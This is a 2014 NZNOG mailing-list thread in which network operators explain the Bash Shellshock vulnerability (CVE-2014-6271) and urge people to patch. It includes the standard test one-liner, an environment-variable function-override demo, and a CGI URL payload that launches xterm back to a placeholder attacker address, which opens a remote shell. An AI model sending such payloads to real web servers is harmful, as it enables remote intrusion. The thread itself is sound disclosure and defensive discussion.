As I understand it, the problem is significantly worse than that. It's possible to add shell commands after the closing '}' which subsequently get executed by bash, for example:

 env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

- this really should not do what it actually does.


The big risk is in CGI execution under web servers. Apache (and others) automatically add CGI URI arguments as environment variables prior to executing CGI scripts. So if I find a CGI script on your web site, and add "?foo='() { ;;}; xterm -display my.ip.address:0.0'" into the URL then if the site CGI script executes _anything_ through bash, maybe even as innocuous as `date` - then that command in the URL gets executed. (I haven't verified that command yet, but you get the gist).

Even if your CGI scripts carefully sanitise and check inputs, there's still a hole there through hidden environment variables that can get executed.

--

Kerry

 

On 25/09/2014 14:41, Don Stokes wrote:

The fundamental problem is this:

In starting, bash treats ANY environment variable whose value starts with "() {" (i.e. open paren, close paren, space, open curly) as a function to be parsed and imported. For example:

$ export ls='() { echo bwahahaha ; }'
$ bash        # any invocation of bash, including from system(), or as /bin/sh
$ ls
bwahahaha

This is the mechanism by which bash's "export -f" (export function) works. (By default, functions are not exported to the environment, which is why you never noticed this before.)

Basically, that functionality has a ridiculous number of potential gotchas, even if the parsing is properly fixed. The unpatched code just blithely throws the string at the command interpreter, and the patches are just band-aids on top of that.

-- don


On 25/09/14 14:14, Nicholas Lee wrote:
Fix may not be complete either:

https://bugzilla.redhat.com/show_bug.cgi?id=1141597#c23

On Thu, Sep 25, 2014 at 11:06 AM, Sebastian Castro <sebastian@nzrs.net.nz> wrote:


On 25/09/14 10:57 am, Dean Pemberton wrote:
> Hi all,
> This isn't normally a security vuln release list but this one looks pretty bad
>
> A newly discovered vulnerability (CVE-2014-6271) in the Bash
> command-line interpreter poses a critical security risk to Unix and
> Linux systems.  It allows remote code execution.
>
> NZITF is responding to this remote execution exploit, with a News page
> that we will be keeping up to date - http://www.nzitf.org.nz/news.html
> .

There are active scans going on already:

http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html


>
> We are also reaching out to technical and security community points of
> contact to raise awareness to the issue and ensure necessary action is
> taken (hence this email to you).  Please note,  no patch is yet
> available for Mac OSX.  However, many other patches are available.
>
> So Patch, Patch, Patch.
>
>
> Regards,
> Dea
> _______________________________________________
> NZNOG mailing list
> NZNOG@list.waikato.ac.nz
> http://list.waikato.ac.nz/mailman/listinfo/nznog
>

--
Sebastian Castro
Technical Research Manager
.nz Registry Services (New Zealand Domain Name Registry Limited)
desk: +64 4 495 2337
mobile: +64 21 400535
_______________________________________________
NZNOG mailing list
NZNOG@list.waikato.ac.nz
http://list.waikato.ac.nz/mailman/listinfo/nznog


_______________________________________________
NZNOG mailing list
NZNOG@list.waikato.ac.nz
http://list.waikato.ac.nz/mailman/listinfo/nznog


_______________________________________________
NZNOG mailing list
NZNOG@list.waikato.ac.nz
http://list.waikato.ac.nz/mailman/listinfo/nznog